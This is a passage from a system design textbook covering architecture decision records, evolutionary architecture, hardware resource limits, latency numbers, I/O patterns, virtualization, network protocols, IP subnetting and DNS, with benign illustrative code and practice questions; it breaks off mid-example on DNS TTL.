Publish order state changes to a Kafka topic partitioned by `order_id`.
Consumers subscribe independently and must be idempotent. Retention: 7 days.
## Consequences
**Positive**
- Order service availability no longer depends on consumers.
- New consumers are added with no change to the producer.
- Replay is possible within the retention window.
**Negative**
- Consumers see eventual consistency (typical lag < 1 s).
- Kafka becomes a critical dependency requiring operational expertise.
- At-least-once delivery: every consumer must implement deduplication.
**Neutral**
- Ordering is guaranteed per `order_id` only, which matches our requirement.
| Field | Purpose |
|---|---|
| Status | Lifecycle marker; superseded ADRs stay in the log |
| Context | The forces at play — constraints, numbers, and pressures |
| Decision | One sentence in the active voice: "We will ..." |
| Consequences | Both the wins and the costs, stated plainly |
Practical conventions: store ADRs in the repository next to the code
(docs/adr/0014-kafka-for-order-events.md) so they are versioned with it;
number them sequentially; keep them to one page; and write one only for
decisions that are costly to reverse or that people will question later — not
for every library choice.
Key Takeaways
- An ADR records a single decision: context, decision, consequences.
- ADRs are immutable — supersede with a new record rather than editing.
- Consequences must include the negatives; that is what future readers need.
- Keep ADRs in version control beside the code, numbered and short.
🧪 Practice
- Write an ADR for "we will use UUIDv7 instead of auto-increment integers for primary keys", including at least two negative consequences.
- Find a decision in a codebase you know whose reasoning is undocumented and write the ADR that should have existed.
- Interview: When would you not write an ADR? (Hint: think about the cost of reversal and how many people the decision constrains.)
Evolutionary Architecture
No system is designed once and finished. Requirements change, traffic grows by orders of magnitude, and the assumptions in your first design log go stale. Evolutionary architecture is the practice of designing so that change stays cheap — optimizing for the ability to change rather than for a predicted end-state that will not arrive as predicted.
This starts with classifying decisions by reversibility. A two-way door can be walked back cheaply: a library choice, a cache eviction policy, an internal API shape. A one-way door is expensive or impossible to undo: a public API contract, a data model that has accumulated a petabyte, a choice of cloud primitive with no equivalent elsewhere. Decide two-way doors fast and one-way doors slowly.
DECISION SPEED BY REVERSIBILITY
high | Deliberate, prototype, | Deliberate hard;
cost | write an ADR | this is where senior
to | (e.g. datastore choice) | time belongs
undo | | (e.g. public API contract)
|-----------------------------+---------------------------
low | Just decide | Decide fast, revisit later
| (e.g. logging library) | (e.g. internal service split)
+-----------------------------+---------------------------
low blast radius high blast radius
The complementary tool is the fitness function: an automated check that asserts an architectural property continuously, so erosion is caught the way a failing test is caught rather than discovered during an incident.
# Fitness functions run in CI and fail the build when the architecture drifts.
def test_p99_latency_within_slo(load_test):
assert load_test.p99_ms < 200 # performance is a testable property
def test_no_layering_violation(imports):
# The domain layer must not depend on the web layer, ever.
assert not any(i.startswith("app.web") for i in imports.of("app.domain"))
def test_service_dependency_graph_is_acyclic(graph):
assert graph.is_acyclic() # cycles make deploys undeployable
def test_public_api_is_backward_compatible(old_schema, new_schema):
assert new_schema.is_compatible_with(old_schema) # one-way door, guarded
Three habits keep evolution possible in practice:
- Defer irreversible commitments until the requirement is real. YAGNI is not laziness; it is refusing to pay today for a guess about tomorrow.
- Migrate incrementally. The strangler fig pattern routes a slice of traffic to a new implementation behind a facade, grows the slice, then removes the old path — no big-bang rewrite, and a rollback at every step.
- Keep contracts stable and internals fluid. Versioned APIs and events let you rewrite everything behind them without coordinating a global change.
STRANGLER FIG MIGRATION
t0 [Client] -> [Facade] -> [Legacy] 100% legacy
t1 [Client] -> [Facade] -> [Legacy] 90%
\-> [New] 10% (shadow or real traffic)
t2 [Client] -> [Facade] -> [Legacy] 10%
\-> [New] 90%
t3 [Client] -> [Facade] -> [New] legacy removed
Every step is individually reversible, which is the entire point.
Finally, revisit the assumption log from section 1.1 on a schedule. Most architectural decay is not a wrong decision — it is a right decision whose assumptions quietly stopped being true.
Key Takeaways
- Design for changeability, not for a predicted end-state.
- Separate two-way doors (decide fast) from one-way doors (decide carefully).
- Fitness functions turn architectural properties into automated tests.
- Migrate incrementally behind stable contracts; revisit assumptions on a schedule.
🧪 Practice
- Classify as one-way or two-way doors: choosing a programming language, choosing an event schema format, exposing a public webhook, picking a logging library.
- Write three fitness functions for a system you know — one for performance, one for structure, one for compatibility.
- Interview: You must replace a 10-year-old monolith that still serves all production traffic. Describe your approach. (Hint: the answer is a sequence of reversible steps, and the first one is not writing code.)
Chapter Summary
| Concept | The one-line version |
|---|---|
| System design | Structuring components — services, stores, networks — not just code |
| HLD vs. LLD | Boxes and contracts first; schemas and algorithms second |
| FRs vs. NFRs | What it does vs. how well; NFRs dictate the topology |
| Constraints/assumptions | Constraints are imposed, assumptions are chosen — label and verify them |
| Quality attributes | Scalability, availability, reliability, maintainability, latency, consistency, durability, cost |
| Availability math | Series multiplies down; parallel redundancy multiplies failure down |
| Little's Law | L = lambda x W ties concurrency, throughput, and latency together |
| Estimation | DAU -> QPS -> storage -> bandwidth -> fleet size, to one significant figure |
| Capacity planning | Size for peak, below the queueing knee, minus one failure domain |
| Bottlenecks | Capacity is set by the most constrained resource; it moves after each fix |
| Trade-offs | Name the currency each option is paid in; weight by ordered design goals |
| ADRs | One decision per record, immutable, consequences included |
| Evolutionary design | Decide two-way doors fast, one-way doors slowly; migrate incrementally |
<a id="2-computing-and-networking-fundamentals"></a>
2. Computing and Networking Fundamentals
Every architecture diagram eventually runs on real CPUs, real disks, and real cables with real physics, and the properties of that hardware decide which designs are fast, which are cheap, and which are impossible. This chapter covers the machine-level resource model, the network protocols that carry every request, the communication patterns built on them, and the infrastructure that routes traffic in production.
<a id="21-hardware-and-resource-model"></a>
2.1 Hardware and Resource Model
Every system is built from four resources with wildly different speeds and costs; knowing their relative magnitudes is what turns architecture from guesswork into arithmetic.
CPU, Memory, Disk, and Network as Resources
Every request your system serves consumes a mix of four things: CPU cycles to compute, memory to hold working data, disk to persist it, and network to move it. A system's capacity is set by whichever of the four saturates first, so knowing what each one costs is the foundation of every capacity estimate and every performance investigation.
Think of a restaurant kitchen. The chefs are CPU — they do the actual work, and you can only hire so many. The counter space is memory — fast to reach, but small and expensive. The walk-in pantry is disk — huge and cheap, but every trip costs you time. And the delivery van is the network — it brings ingredients from far away, and no amount of kitchen efficiency makes the van arrive faster.
THE RESOURCE HIERARCHY (typical single server, order of magnitude)
Resource Capacity Speed Cost per unit Volatile?
--------------------------------------------------------------------------
CPU 8-128 cores ~1 ns / cache hit high n/a
Memory 64 GB - 2 TB ~100 ns ~$5/GB/month yes
SSD 1-30 TB ~100 us ~$0.10/GB/month no
HDD 1-20 TB ~10 ms (seek) ~$0.02/GB/month no
Network 10-100 Gbps ~0.5 ms in-DC egress billed n/a
Rule of thumb: each step down is ~1000x slower and ~10x cheaper per byte.
The practical skill is classifying a workload by which resource it leans on, because the fix is completely different in each case.
# Same "work", three very different resource profiles.
def cpu_bound(image_bytes):
# Pure computation: scales with cores, benefits from vectorization,
# gains nothing from more RAM or a faster disk.
return resize_and_compress(image_bytes)
def memory_bound(user_ids):
# Holds a large working set; the fix is a bigger cache or smaller records,
# not more cores. Exceeding RAM triggers swapping and falls off a cliff.
return {uid: SESSION_CACHE[uid] for uid in user_ids}
def io_bound(order_id):
# Spends nearly all its wall-clock time waiting. More cores do nothing;
# concurrency (async, connection pools) is what raises throughput.
row = db.query("SELECT * FROM orders WHERE id = %s", order_id) # ~1-10 ms
resp = http.get(f"https://psp.example.com/charges/{row.charge}") # ~50 ms
return combine(row, resp)
A crucial asymmetry: CPU-bound work is limited by how many workers you have, while I/O-bound work is limited by how many you can have waiting at once. That is why a Node.js or async Python service handles thousands of concurrent slow requests on one core, and why adding cores to an I/O-bound service changes nothing.
| Symptom | Likely bound | First lever |
|---|---|---|
| CPU at 90%+, latency rises with load | CPU | Profile hot paths, add cores/instances |
| Steady swapping, GC pauses, OOM kills | Memory | Shrink working set, add RAM, cache less |
| High iowait, disk queue depth > 1 | Disk | Batch writes, add IOPS, use SSD |
| Link near capacity, retransmits rising | Network | Compress, cache at edge, move data closer |
| All four idle but latency is high | Waiting | Downstream dependency or lock contention |
Key Takeaways
- Every request consumes CPU, memory, disk, and network; capacity is set by whichever saturates first.
- Each step down the hierarchy is roughly 1000x slower and 10x cheaper per byte.
- CPU-bound work needs more workers; I/O-bound work needs more concurrency.
- Identify which resource a workload is bound by before optimizing anything.
🧪 Practice
- Classify each as CPU-, memory-, disk-, or network-bound: video transcoding, an in-memory session store, a nightly log compaction job, serving 4K video to viewers.
- A service is at 20% CPU with 300 ms p99 latency. List three explanations and the metric that would confirm each.
- Interview: You must serve a 50 GB dataset with sub-millisecond lookups. Walk through your options. (Hint: compare the cost of keeping it entirely in RAM against the latency of an SSD, and consider whether the access distribution is uniform.)
Latency Numbers Every Engineer Should Know
The most useful thing an engineer can carry in their head is a rough sense of how long operations take relative to one another. Not because the exact figures matter — they change with every hardware generation — but because the ratios barely change, and the ratios are what decide designs. If you know a network round trip costs 100,000 times a memory access, you never need to be told to cache.
LATENCY LADDER (orders of magnitude; scaled so 1 ns = 1 second)
Operation Real time Human scale
-----------------------------------------------------------------------
L1 cache reference 1 ns 1 second
Branch mispredict 3 ns 3 seconds
L2 cache reference 4 ns 4 seconds
Mutex lock/unlock (uncontended) 17 ns 17 seconds
Main memory reference 100 ns 1.7 minutes
Compress 1 KB 2 us 33 minutes
Read 1 MB sequentially from memory 3 us 50 minutes
SSD random read 16 us 4.4 hours
Read 1 MB sequentially from SSD 0.5 ms 5.8 days
Round trip within the same datacenter 0.5 ms 5.8 days
HDD seek 10 ms 3.9 months
Round trip across a continent 60 ms 1.9 years
Round trip Europe <-> Australia 250 ms 7.9 years
Reading the ladder as human time makes the design consequences obvious. A memory access is a coffee break; a cross-ocean round trip is nearly a decade. No amount of clever code closes that gap — only moving the data closer does.
# Latency budgets are built by adding up the ladder, not by guessing.
def timeline_request_budget():
budget = {
"tls + tcp handshake (cached session)": 5, # ms, client to edge
"edge -> origin round trip": 40,
"auth check (cached in memory)": 0.1,
"db query (indexed, same AZ)": 2,
"3 sequential internal calls @ 1 ms": 3, # sequential is the trap
"serialize 200 KB json": 4,
"network transfer to client": 25,
}
total = sum(budget.values())
print(f"{total:.1f} ms budget consumed") # 79.1 ms
# Making the 3 internal calls concurrent saves 2 ms. Moving the origin
# closer to the edge saves 40. Always attack the biggest term.
return total
timeline_request_budget()
Three consequences worth internalizing:
- Anything crossing a network is at least ~10,000x a memory access. Batch, cache, and parallelize network calls; sequential chains of them are the most common cause of slow APIs.
- Physics sets a floor. Light in fibre travels ~200,000 km/s, so a 20,000 km round trip cannot beat ~100 ms no matter what you build. Global low latency means geographic distribution, not optimization.
- Random disk access on spinning media is catastrophic at ~10 ms; this single number explains why databases are built around sequential writes.
Key Takeaways
- Memorize the ratios, not the exact numbers; the ratios drive design.
- Memory ~100 ns, SSD ~16 us, in-datacenter round trip ~0.5 ms, cross-ocean ~250 ms.
- Network calls dominate latency budgets — batch and parallelize them.
- The speed of light imposes a hard floor that only geography can lower.
🧪 Practice
- Estimate the total latency of a request that makes 5 sequential database queries in the same datacenter, then the same 5 run concurrently.
- A page issues 30 sequential API calls to a server 80 ms away. How long does it take? Propose two fixes and estimate each one's saving.
- Interview: Why is reading 1 MB from memory faster than reading 1 MB from SSD, even though both are "just reading bytes"? (Hint: think about what physically has to happen per request, and about per-operation overhead versus per-byte cost.)
Sequential vs. Random I/O
Two programs can read the same number of bytes from the same disk and differ in speed by a factor of a hundred. The difference is access pattern: reading bytes that sit next to each other (sequential) versus jumping around (random). This single property shapes the internals of every database and file format you will ever use.
On a spinning disk the reason is mechanical: a read head must physically move to the right track and wait for the platter to rotate under it. That is the ~10 ms seek. Once positioned, streaming the next megabyte costs almost nothing. The analogy is a record player — dropping the needle takes a second, but playing continuously is free.
SSDs have no moving parts, so the gap narrows dramatically, but it does not close. Each request carries fixed overhead (command submission, flash translation lookup), reads happen in pages of 4-16 KB, and erases happen in much larger blocks. Sequential access amortizes the per-operation cost across many bytes and lets the device and the OS read ahead.
THROUGHPUT BY ACCESS PATTERN (order of magnitude)
Sequential Random 4 KB Ratio
HDD ~200 MB/s ~1 MB/s ~200x
SATA SSD ~550 MB/s ~90 MB/s ~6x
NVMe SSD ~5,000 MB/s ~600 MB/s ~8x
Disk layout:
sequential [####][####][####][####] one seek, then stream
random [##]......[##]....[##] a seek per operation
# The design consequence: turn random writes into sequential ones.
# Anti-pattern: update rows one at a time -> random writes + a round trip each
for order in orders: # 10,000 orders
db.execute("UPDATE orders SET status=%s WHERE id=%s",
(order.status, order.id)) # ~10,000 random I/Os
# Better: one batched, sequentially written statement
db.execute_many("UPDATE orders SET status=%s WHERE id=%s",
[(o.status, o.id) for o in orders]) # 1 round trip
# Best for append-heavy workloads: write an ordered log, sort/merge later.
# This is exactly what an LSM tree does — buffer writes in memory, flush them
# as one sorted, sequentially written file, and merge files in the background.
with open("events.log", "ab") as f: # append-only = sequential
for e in events:
f.write(serialize(e))
f.flush()
os.fsync(f.fileno()) # one durability barrier for the batch
This is why so many storage systems look the way they do: write-ahead logs are append-only, LSM trees convert random writes into sequential flushes, columnar formats store each column contiguously so scans stream, and clustered indexes physically order rows so that range queries read consecutive pages.
| Pattern | Cost driver | Design response |
|---|---|---|
| Random point reads | One I/O per lookup | Cache in memory; use an index |
| Random writes | Seek/erase amplification | Buffer and flush sequentially (LSM) |
| Full scans | Bytes moved | Columnar layout, compression |
| Range queries | Locality | Clustered index, sorted files |
Key Takeaways
- Sequential I/O beats random I/O by ~200x on HDD and still ~6-8x on SSD.
- The gap comes from seek time (HDD) and per-operation overhead plus page granularity (SSD).
- Storage engines are designed to convert random writes into sequential ones.
- Batching is the simplest way to turn random access into sequential access.
🧪 Practice
- Estimate the time to read 1 GB sequentially versus as 250,000 random 4 KB reads, on both HDD and NVMe SSD.
- Explain why appending to a log file and periodically merging is faster than updating records in place, despite writing more total bytes.
- Interview: Why do LSM trees favour write-heavy workloads while B-trees favour read-heavy ones? (Hint: think about which one turns writes into sequential I/O and what it pays for that at read time.)
Bare Metal vs. Virtual Machines vs. Containers
Before you can run code you must decide what it runs on, and the options form a spectrum trading isolation and control against density and startup speed. The choice affects performance predictability, cost, deployment speed, and blast radius — so it is an architectural decision, not just an ops detail.
Bare metal is a physical server dedicated to you: maximum performance, no hypervisor tax, complete control, but slow to provision and impossible to subdivide efficiently. Virtual machines run a hypervisor that emulates hardware, letting many guest operating systems share one physical host with strong isolation. Containers skip the guest OS entirely — they are processes on a shared kernel, isolated by namespaces (what a process can see) and cgroups (what it can consume).
The analogy: bare metal is owning a house, a VM is renting an apartment with your own plumbing and walls, and a container is renting a room in a shared flat — cheap and instant, but you share the kitchen, and a badly behaved flatmate affects you.
BARE METAL VIRTUAL MACHINES CONTAINERS
+-------------+ +-----------+-----------+ +-----+-----+-----+
| App | | App | App | | App | App | App |
+-------------+ +-----------+-----------+ +-----+-----+-----+
| OS | | Guest OS | Guest OS | | Shared libs |
+-------------+ +-----------+-----------+ +-----------------+
| Hardware | | Hypervisor | | Host kernel |
+-------------+ +-----------------------+ +-----------------+
| Hardware | | Hardware |
+-----------------------+ +-----------------+
isolation: strongest ------------------------------------> weakest
density: lowest ------------------------------------> highest
boot time: minutes ~30 seconds ~100 milliseconds
# A container image is a filesystem plus metadata — no kernel inside it.
FROM python:3.12-slim # base layer: userland only, shares host kernel
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt # cached layer
COPY . .
# Limits are enforced by cgroups at run time, not by the image:
# docker run --cpus=2 --memory=1g myapp
# Exceeding the memory limit gets the process OOM-killed, not swapped.
CMD ["python", "-m", "app"]
| Dimension | Bare metal | Virtual machine | Container |
|---|---|---|---|
| Isolation boundary | Physical | Hypervisor | Kernel namespaces |
| Startup time | Minutes to hours | Tens of seconds | Sub-second |
| Overhead | None | 2-10% | ~1% |
| Density per host | 1 | Tens | Hundreds |
| Kernel | Yours | Yours (guest) | Shared with host |
| Blast radius of escape | n/a | Very contained | Host-wide risk |
| Best for | Predictable high performance, licensing | Mixed OSes, strong tenancy isolation | Microservices, fast scaling and CI |
Two practical warnings. Noisy neighbours: on shared hosts another tenant's load can steal CPU and I/O from you — watch the "steal time" metric on VMs. Shared kernel: containers of mutually untrusted tenants on one kernel are a security decision; that is why lightweight VM runtimes (Firecracker, gVisor) exist to give container-like startup with VM-like isolation.
Key Takeaways
- Bare metal, VMs, and containers trade isolation and control against density and startup speed.
- Containers share the host kernel — near-zero overhead, weaker isolation.
- Container limits come from cgroups at run time, not from the image.
- Choose based on isolation requirements, startup speed needs, and tenancy model.
🧪 Practice
- For each, pick a platform and justify it: a latency-sensitive trading engine, a multi-tenant SaaS running untrusted customer code, a CI runner fleet, a legacy Windows application.
- Explain why a container starts in milliseconds while a VM takes tens of seconds.
- Interview: Your containerized service is randomly slow but its CPU usage looks low. What do you check? (Hint: the metric you want describes time the hypervisor gave to someone else, and there is a second one about cgroup throttling.)
Vertical Resource Limits
Scaling up feels like the simplest answer to load — buy a bigger machine — and it works until it does not. Knowing precisely where the ceilings are tells you when to stop scaling vertically and start scaling horizontally, and it prevents a whole class of outages caused by exhausting a limit nobody was watching.
The ceilings are not just "cores and RAM". The ones that actually cause production incidents are the small, unglamorous ones.
LIMITS THAT BITE, IN ROUGH ORDER OF HOW OFTEN THEY CAUSE INCIDENTS
1. File descriptors default ulimit often 1024; every socket and file is one
2. Ephemeral ports ~28,000 per source IP:dest pair -> outbound conn limit
3. Thread count each thread costs ~1 MB of stack; 10k threads = 10 GB
4. Connection pool size smaller than you think; blocks under load
5. Memory bandwidth cores starve waiting for RAM before CPU saturates
6. NUMA locality cross-socket memory access is ~2x slower
7. Single-core ceiling one hot lock or one single-threaded loop caps it all
8. Network interface 10-100 Gbps per NIC, shared by everything on the host
9. Instance size the largest cloud instance is a hard wall
# Ephemeral port exhaustion: the classic "we scaled up and it broke" bug.
EPHEMERAL_RANGE = 32_768, 60_999 # typical Linux default
ports_available = EPHEMERAL_RANGE[1] - EPHEMERAL_RANGE[0] + 1
print(ports_available) # 28232
# A TCP connection is identified by (src_ip, src_port, dst_ip, dst_port), so
# the limit applies PER destination pair, not globally.
TIME_WAIT_SECONDS = 60 # sockets linger after close
max_new_conns_per_second = ports_available / TIME_WAIT_SECONDS
print(round(max_new_conns_per_second)) # 470
# 470 new connections/second to a single backend, per source IP. A service
# opening a fresh connection per request hits this wall long before CPU does.
# Fixes: connection pooling and keep-alive (reuse), more destination IPs,
# or widening the port range.
# Checking the ceilings on a running host
ulimit -n # file descriptor soft limit
cat /proc/sys/net/ipv4/ip_local_port_range # ephemeral port range
ss -s # socket counts by state
nproc # visible cores
numactl --hardware # NUMA topology and node distances
| Limit | Typical default | Symptom when hit |
|---|---|---|
| File descriptors | 1024 (soft) | "Too many open files"; accept() fails |
| Ephemeral ports | ~28k | "Cannot assign requested address" |
| Thread stacks | 1 MB each | OOM at a few thousand threads |
| Connection pool | 10-20 | Latency spikes, queueing at the pool |
| Largest cloud instance | ~few TB RAM | Nowhere left to scale up |
The strategic point: vertical scaling buys time, and time is genuinely valuable — it is far cheaper than a distributed rewrite. But its ceiling is fixed and its cost curve turns superlinear at the top end, while a single machine remains a single failure domain. Plan the horizontal path before you need it.
Key Takeaways
- Vertical limits are rarely CPU or RAM; they are descriptors, ports, threads, and pools.
- Ephemeral port exhaustion caps new outbound connections at a few hundred per second per destination — pool and keep alive.
- The largest instance is a hard wall, and one machine is one failure domain.
- Scale up to buy time, but design the horizontal path before you hit the ceiling.
🧪 Practice
- A service opens a new database connection per request at 2,000 RPS. Which limit does it hit first, and what is the fix?
- Calculate how much memory 5,000 threads consume at the default stack size, and propose an architecture that avoids needing them.
- Interview: Your service works fine at 500 RPS and fails at 1,500 RPS with connection errors, while CPU sits at 40%. Diagnose it. (Hint: enumerate the per-process and per-host limits a connection consumes.)
<a id="22-network-protocols"></a>
2.2 Network Protocols
Every request in a distributed system is carried by a stack of protocols, and each layer contributes latency, failure modes, and constraints you will eventually have to reason about.
OSI and TCP/IP Models
Networking is hard because it solves many problems at once: turning bits into signals, finding a machine across the planet, recovering lost data, and agreeing on what the bytes mean. Layering is how that complexity is made tractable — each layer solves one problem and offers a clean service to the layer above, so TCP does not care whether it runs over fibre or Wi-Fi, and HTTP does not care how packets were retransmitted.
The OSI model is the seven-layer teaching model. The TCP/IP model is the four-layer description of what is actually implemented. You will hear both, often mixed ("a layer 7 load balancer" is OSI language about an HTTP proxy).
| OSI layer | TCP/IP layer | Job | Examples |
|---|---|---|---|
| 7 Application | Application | Meaning of the data | HTTP, gRPC, DNS, SMTP |
| 6 Presentation | Application | Encoding, encryption, compression | TLS, JSON, Protobuf |
| 5 Session | Application | Dialogue and session state | TLS sessions, RPC sessions |
| 4 Transport | Transport | Process-to-process delivery | TCP, UDP, QUIC |
| 3 Network | Internet | Host-to-host routing across networks | IP, ICMP, BGP |
| 2 Data link | Link | Frames on one physical hop | Ethernet, Wi-Fi, ARP |
| 1 Physical | Link | Bits on the wire | Copper, fibre, radio |
The mechanism that makes layering work is encapsulation: each layer wraps the payload from above in its own header, and the receiving side unwraps in reverse. It is a set of nested envelopes — the postal service reads only the outer address and never opens the letter.
ENCAPSULATION OF ONE HTTP REQUEST
Application [ GET /orders HTTP/1.1 Host: api.example.com ]
|
TLS [ TLS record | encrypted application data ]
|
Transport [ TCP hdr | ...payload... ] src/dst port,
| seq, ack, flags
Network [ IP hdr | TCP segment ] src/dst IP, TTL
|
Link [ Eth hdr | IP packet | Eth trailer ] MAC addresses
|
Physical 101101000111010101110...
Overhead: ~40 bytes of TCP+IP headers per packet, plus ~20-60 for TLS
records. On a 1500-byte MTU that is ~3-7% pure protocol tax.
Why this matters architecturally: it tells you what a device can see. A layer 4 load balancer sees IPs and ports, so it can route fast but cannot read a URL path. A layer 7 load balancer terminates the connection and parses HTTP, so it can route by path or header — at the cost of doing more work and breaking the end-to-end connection.
Key Takeaways
- Layering isolates concerns so each protocol can evolve independently.
- OSI has seven layers (teaching model); TCP/IP has four (what is built).
- Encapsulation wraps each layer's payload in headers, adding a few percent of overhead.
- The layer a device operates at determines what it can see and therefore what routing decisions it can make.
🧪 Practice
- For each, name the OSI layer: an Ethernet MAC address, a TCP port, a TLS certificate, an HTTP
Hostheader, a BGP route.- Compute the protocol overhead percentage of sending a 100-byte payload over TCP/IP on Ethernet, and compare it with a 1400-byte payload.
- Interview: What can a layer 4 load balancer do that a layer 7 one cannot, and vice versa? (Hint: think about what each must decrypt or parse, and what that costs.)
TCP vs. UDP
IP gets a packet from one host to another, but it makes no promises: packets may be lost, duplicated, reordered, or delayed. The transport layer decides what to do about that, and there are exactly two mainstream answers. TCP turns the unreliable packet service into a reliable, ordered byte stream. UDP does almost nothing and hands you the raw unreliability.
TCP is a phone call: you dial, the other side picks up, you both know the call is live, and words arrive in order. UDP is shouting across a crowded room: fast, no setup, and no guarantee anyone heard.
TCP THREE-WAY HANDSHAKE (one full round trip before any data)
Client Server
| ---------- SYN (seq=x) ---------> |
| <----- SYN-ACK (seq=y, ack=x+1) -- |
| ---------- ACK (ack=y+1) --------> |
| ========== data flows ==========> |
Cost: 1 RTT before the first byte. Add TLS 1.3 (1 more RTT) and a
cross-continent link (60 ms RTT) and you have spent 120 ms before the
server has even seen the request path.
TCP's guarantees are not free. It gives you: reliable delivery (lost segments are retransmitted), ordering (a sequence number per byte), flow control (the receiver advertises a window so a fast sender cannot swamp it), and congestion control (the sender backs off when the network shows loss). The price is connection setup, per-connection state on both ends, and head-of-line blocking — one lost segment stalls delivery of everything behind it, even data that already arrived.
| Property | TCP | UDP |
|---|---|---|
| Connection | Handshake required (1 RTT) | Connectionless, send immediately |
| Reliability | Retransmits lost data | None; the app must handle loss |
| Ordering | Guaranteed | None |
| Flow/congestion control | Yes | None (app must implement) |
| Header size | 20+ bytes | 8 bytes |
| Head-of-line blocking | Yes | No |
| Typical uses | HTTP/1-2, databases, RPC, email | DNS, QUIC/HTTP3, VoIP, gaming, metrics |
import socket
# TCP: connect, then treat it as a stream. recv() may return partial data,
# so real code must frame messages itself (length prefix or delimiter).
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.settimeout(5) # ALWAYS set a timeout; the default is forever
tcp.connect(("example.com", 80)) # costs one round trip
tcp.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
data = tcp.recv(4096) # a "stream": boundaries are not preserved
# UDP: no connect, no guarantee. Each sendto() is one independent datagram
# that may vanish, arrive twice, or arrive out of order.
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.settimeout(2)
udp.sendto(b"metric:latency:42", ("stats.internal", 8125)) # fire and forget
# Chosen deliberately here: losing one metric sample is cheaper than making
# the application wait on a handshake and retransmissions.
Choose UDP when loss is cheaper than delay (live audio, telemetry, game state) or when you intend to implement your own reliability — which is exactly what QUIC does, rebuilding ordering and retransmission in userspace on top of UDP to escape TCP's head-of-line blocking and ossified middleboxes.
Key Takeaways
- TCP provides reliability, ordering, flow and congestion control at the cost of a handshake and head-of-line blocking.
- UDP provides nothing beyond addressing — which makes it fast and fully controllable by the application.
- A TCP handshake costs one RTT before any data; TLS adds more.
- Use UDP when timeliness beats completeness, or when building custom reliability such as QUIC.
🧪 Practice
- Choose TCP or UDP for each and justify: file upload, live video call, DNS query, database replication, real-time multiplayer position updates.
- Explain why a single lost packet can stall an entire HTTP/2 connection but not an HTTP/3 one.
- Interview: Your API's p99 latency is dominated by connection setup. What do you change? (Hint: count the round trips before the first byte, and consider which of them can be reused or eliminated.)
IP Addressing and Subnets
Every machine on a network needs an address, and every design that involves a private network, a VPC, a firewall rule, or a peering connection eventually becomes a conversation about address ranges. Getting the plan wrong is expensive: overlapping ranges cannot be peered, and re-addressing a live network is one of the least pleasant migrations there is.
An IPv4 address is 32 bits, written as four bytes (10.0.12.5). CIDR
notation appends a prefix length: 10.0.0.0/16 means "the first 16 bits are
the network, the remaining 16 identify hosts". The smaller the number after the
slash, the bigger the block. Think of it as a postcode: /8 is a country, /16
a city, /24 a street, /32 a single house.
CIDR SIZING CHEAT SHEET
Prefix Addresses Typical use
------------------------------------------------------
/8 16,777,216 A whole private range (10.0.0.0/8)
/16 65,536 One VPC
/20 4,096 A large subnet
/24 256 One subnet per AZ (a common default)
/28 16 A small isolated subnet
/32 1 A single host (used in firewall rules)
Private ranges (RFC 1918) — never routed on the public internet:
10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
import ipaddress
vpc = ipaddress.ip_network("10.0.0.0/16")
print(vpc.num_addresses) # 65536
# Carve one /24 subnet per availability zone
subnets = list(vpc.subnets(new_prefix=24)) # 256 possible /24s
for name, net in zip(("az-a", "az-b", "az-c"), subnets):
print(name, net, net.num_addresses)
# az-a 10.0.0.0/24 256
# az-b 10.0.1.0/24 256
# az-c 10.0.2.0/24 256
# Cloud providers reserve addresses in every subnet (AWS reserves 5:
# network, VPC router, DNS, future use, broadcast), so usable hosts are fewer.
print(256 - 5) # 251 usable per /24
# Overlap is the cardinal sin: these two VPCs can never be peered.
a = ipaddress.ip_network("10.0.0.0/16")
b = ipaddress.ip_network("10.0.128.0/17")
print(a.overlaps(b)) # True -> re-address one of them
IPv6 solves exhaustion with 128-bit addresses (2001:db8::1), enough that NAT
becomes unnecessary and every device can have a globally routable address. It is
widely deployed at the edge (mobile networks, CDNs) and increasingly inside
cloud VPCs, but dual-stack operation remains the norm.
Three planning rules that prevent most pain:
- Allocate generously. Address space is free; a
/16per VPC costs nothing and leaves room to grow. - Never overlap across environments, accounts, or partners you might ever connect — reserve a distinct block per region and per environment up front.
- Leave gaps between allocations so a subnet can be expanded without fragmenting the plan.
Key Takeaways
- CIDR prefix length sets block size: smaller prefix means more addresses.
- RFC 1918 ranges (10/8, 172.16/12, 192.168/16) are for private networks.
- Cloud subnets reserve several addresses, so usable capacity is less than the arithmetic suggests.
- Overlapping CIDRs cannot be peered; plan non-overlapping ranges from day one and allocate generously.
🧪 Practice
- How many usable addresses are in a
/26? How many/26subnets fit in a/22?- Design a VPC address plan for three regions, three AZs each, with separate public and private subnets and no overlaps.
- Interview: Two companies merge and both use
10.0.0.0/16internally. What are your options? (Hint: one option rewrites addresses, one hides them behind a translation layer, and one avoids routing between them entirely.)
DNS Resolution and Record Types
Humans use names and the network uses addresses, so something has to translate
between them. DNS is that system: a globally distributed, hierarchical, heavily
cached database that turns api.example.com into an IP address. It is also, in
practice, the control plane for traffic management — failover, geo-routing, and
blue-green cutovers are frequently DNS changes.
Resolution walks down the hierarchy, from the root, to the top-level domain, to the authoritative server for the domain. Almost every step is cached, which is why the average lookup is fast and why changes take time to spread.
RECURSIVE RESOLUTION OF api.example.com
Browser --> OS cache --> Recursive resolver (ISP / 8.8.8.8 / VPC resolver)
|
|-- root servers: "ask .com at 192.5.6.30"
|-- .com TLD: "ask ns1.example.com"
|-- authoritative: "api.example.com = 93.184.x.x"
v
answer cached for TTL seconds at every hop
Cold path: 4 round trips. Warm path (cached): ~0 ms. This is why a low TTL
costs latency and a high TTL costs agility.
| Record | Purpose | Example |
|---|---|---|
A | Name to IPv4 address | api.example.com -> 93.184.216.34 |
AAAA | Name to IPv6 address | api.example.com -> 2606:2800::1 |
CNAME | Alias to another name | www -> api.example.com |
ALIAS/ANAME | CNAME-like, but legal at the zone apex | example.com -> lb.provider.net |
MX | Mail servers, with priority | 10 mail.example.com |
TXT | Arbitrary text: SPF, DKIM, domain proofs | v=spf1 include:_spf.google.com ~all |
NS | Delegates a zone to nameservers | example.com -> ns1.provider.net |
SRV | Service location: host, port, priority | _sip._tcp -> 10 60 5060 sip.example.com |
PTR | Reverse lookup, IP to name | Used for mail reputation, logging |
# TTL is the single most consequential DNS setting in an incident.
TTL_SECONDS = 300 # 5 minutes
# Failover time is bounded below by the TTL, because resolvers and clients
# keep serving the cached answer until it expires.
print(f"worst-case client failover: {TTL_SECONDS}s") # 300s
# Before a planned migration, lower the TTL well in advance:
